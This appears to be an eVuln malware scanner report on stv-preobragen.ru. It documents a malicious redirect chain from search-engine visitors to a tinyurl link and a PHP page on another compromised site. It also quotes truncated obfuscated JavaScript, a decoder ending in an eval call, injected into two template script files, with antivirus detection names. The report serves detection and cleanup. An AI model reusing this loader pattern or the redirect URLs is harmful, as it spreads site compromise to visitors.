Malware Scanner report for stv-preobragen.ru

Malicious/Suspicious/Total urls checked: 2/0/15

2 pages have malicious code. See details below

Blacklists: OK

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://tinyurl.com/clobphp
216 websites infected.
->http://vrd-renkum.nl/templates/css/css/www/4.php
318 websites infected.

The website "stv-preobragen.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://stv-preobragen.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: stv-preobragen.ru Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 302 Found Connection: close Date: Sun, 04 May 2014 00:14:05 GMT Location: http://tinyurl.com/clobphp Server: nginx/1.4.1 Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17	malicious
URL: http://tinyurl.com/clobphp (imitation of visitor from search engine) GET /clobphp HTTP/1.1 Host: tinyurl.com Referer: http://www.google.com/search?q=redirect+check2	HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 04 May 2014 00:14:05 GMT Location: http://vrd-renkum.nl/templates/css/css/www/4.php Server: TinyURL/1.6 Content-Length: 0 Content-Type: text/html Set-Cookie: tinyUUID=3658652bff514e9e0be20000; expires=Mon, 04-May-2015 00:14:05 GMT; path=/; domain=.tinyurl.com X-Powered-By: PHP/5.4.27 X-Tiny: cache 0.010457038879395	malicious

Scanned pages/files

Request	Server response	Status
http://stv-preobragen.ru/	200 OK Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js	200 OK Content-Length: 16782 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var DD_belatedPNG={ns:"DD_belatedPNG",imgSize:{},delay:10,nodesFixed:0,createVmlNameSpace:function(){if(document.namespaces&&!document.namespaces[this.ns]){document.namespaces.add(this.ns,"urn:schemas-microsoft-com:vml")}},createVmlStyleSheet:function(){var b,a;b=document.createElement("style");b.setAttribute("media","screen");document.documentElement.firstChild.insertBefore(b,document.documentElement.firstChild.firstChild);if(b.styleSheet){b=b.styleSheet;b.addRule(this.ns+"\\:*"," ... 15375 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: AntiVir JS/Agent.CB.5 Avast JS:Redirector-AKA [Trj] Ad-Aware Trojan.JS.Redirector.BOQ Ikarus Trojan.JS.Redirector Rising JS:Malware.JCrypto!1.9BF9 nProtect Trojan.JS.Redirector.BOQ K7AntiVirus Trojan ( 91ee82b70 ) Emsisoft Trojan.JS.Redirector.BOQ (B) Comodo TrojWare.JS.Agent.TC K7GW Exploit ( 04c553061 ) DrWeb JS.Redirector.188 Microsoft Trojan:JS/Redirector.MK Kaspersky Trojan.JS.Redirector.zb MicroWorld-eScan Trojan.JS.Redirector.BOQ Fortinet JS/Redirector.NJI!tr NANO-Antivirus Trojan.Script.Redirector.bqiube F-Secure Trojan.JS.Redirector.BOQ VIPRE Trojan.JS.Redirector.mk (v) F-Prot JS/Redir.SA AVG HTML/Framer Norman Redirector.JF GData Trojan.JS.Redirector.BOQ Commtouch JS/Redir.SA ESET-NOD32 JS/Redirector.NJG BitDefender Trojan.JS.Redirector.BOQ
http://stv-preobragen.ru/assets/templates/stav-preobragen/javascript/site.js	200 OK Content-Length: 11313 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getbg() { var rootContentElement = document.getElementById("page-content"); var div = rootContentElement.getElementsByTagName("div")[0]; var scripts = rootContentElement.getElementsByTagName("script")[0]; var parentElements = rootContentElement.getElementsByTagName("*"); console.log(); if(typeof div == "undefined" \|\| parentElements[0].tagName !== "div") { rootContentElement.style.backgroundColor = '#FBB03B'; } ... 10526 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: AntiVir JS/Agent.CB.5 Avast JS:Redirector-AKA [Trj] Ad-Aware Trojan.JS.Agent.JAB Ikarus Trojan.JS.Redirector Rising JS:Malware.JCrypto!1.9BF9 nProtect Trojan.JS.Agent.JAB K7AntiVirus Trojan ( 91ee82b70 ) Emsisoft Trojan.JS.Agent.JAB (B) Comodo TrojWare.JS.Agent.TC K7GW Exploit ( 04c553061 ) DrWeb JS.Redirector.188 Microsoft Trojan:JS/Redirector.MK Kaspersky Trojan.JS.Redirector.zb MicroWorld-eScan Trojan.JS.Agent.JAB Fortinet JS/Redirector.NJI!tr NANO-Antivirus Trojan.Script.Redirector.bqiube F-Secure Trojan.JS.Agent.JAB VIPRE Trojan.JS.Redirector.mk (v) F-Prot JS/Redir.SA AVG HTML/Framer Norman ShellCode.V GData Trojan.JS.Agent.JAB Commtouch JS/Redir.SA ESET-NOD32 JS/Redirector.NJG BitDefender Trojan.JS.Agent.JAB
http://stv-preobragen.ru//yandex.st/share/share.js/	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ <span>...78 symbols skipped</span>	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ <span>...139 symbols skipped</span>	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ <span>...200 symbols skipped</span>	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ <span>...261 symbols skipped</span>	404 Not Found Content-Length: 12401 Content-Type: text/html	clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ <span>...322 symbols skipped</span>	404 Not Found Content-Length: 12401 Content-Type: text/html	clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=stv-preobragen.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://stv-preobragen.ru/

Result: stv-preobragen.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for stv-preobragen.ru

Malware & Hack Repair

Website Hack Insurance

Malicious/Suspicious Redirects

Scanned pages/files

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools